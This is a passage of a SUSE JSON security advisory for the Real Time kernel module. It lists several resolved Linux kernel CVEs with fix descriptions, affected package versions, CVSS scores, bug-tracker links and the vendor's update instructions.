"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71111"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2025-71114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71114"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvia_wdt: fix critical boot hang due to unnamed resource allocation\n\nThe VIA watchdog driver uses allocate_resource() to reserve a MMIO\nregion for the watchdog control register. However, the allocated\nresource was not given a name, which causes the kernel resource tree\nto contain an entry marked as \"\u003cBAD\u003e\" under /proc/iomem on x86\nplatforms.\n\nDuring boot, this unnamed resource can lead to a critical hang because\nsubsequent resource lookups and conflict checks fail to handle the\ninvalid entry properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71114",
"url": "https://www.suse.com/security/cve/CVE-2025-71114"
},
{
"category": "external",
"summary": "SUSE Bug 1256752 for CVE-2025-71114",
"url": "https://bugzilla.suse.com/1256752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71114"
},
{
"cve": "CVE-2025-71116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71116",
"url": "https://www.suse.com/security/cve/CVE-2025-71116"
},
{
"category": "external",
"summary": "SUSE Bug 1256744 for CVE-2025-71116",
"url": "https://bugzilla.suse.com/1256744"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71116"
},
{
"cve": "CVE-2025-71118",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71118"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Avoid walking the Namespace if start_node is NULL\n\nAlthough commit 0c9992315e73 (\"ACPICA: Avoid walking the ACPI Namespace\nif it is not there\") fixed the situation when both start_node and\nacpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed\non Honor Magicbook 14 Pro [1].\n\nThat happens due to the access to the member of parent_node in\nacpi_ns_get_next_node(). The NULL pointer dereference will always\nhappen, no matter whether or not the start_node is equal to\nACPI_ROOT_OBJECT, so move the check of start_node being NULL\nout of the if block.\n\nUnfortunately, all the attempts to contact Honor have failed, they\nrefused to provide any technical support for Linux.\n\nThe bad DSDT table\u0027s dump could be found on GitHub [2].\n\nDMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025\n\n[ rjw: Subject adjustment, changelog edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71118",
"url": "https://www.suse.com/security/cve/CVE-2025-71118"
},
{
"category": "external",
"summary": "SUSE Bug 1256763 for CVE-2025-71118",
"url": "https://bugzilla.suse.com/1256763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71118"
},
{
"cve": "CVE-2025-71119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71119",
"url": "https://www.suse.com/security/cve/CVE-2025-71119"
},
{
"category": "external",
"summary": "SUSE Bug 1256730 for CVE-2025-71119",
"url": "https://bugzilla.suse.com/1256730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71119"
},
{
"cve": "CVE-2025-71120",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71120"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf\n\nA zero length gss_token results in pages == 0 and in_token-\u003epages[0]\nis NULL. The code unconditionally evaluates\npage_address(in_token-\u003epages[0]) for the initial memcpy, which can\ndereference NULL even when the copy length is 0. Guard the first\nmemcpy so it only runs when length \u003e 0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71120",
"url": "https://www.suse.com/security/cve/CVE-2025-71120"
},
{
"category": "external",
"summary": "SUSE Bug 1256779 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "external",
"summary": "SUSE Bug 1256780 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-71120"
},
{
"cve": "CVE-2025-71123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can\u0027t be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall 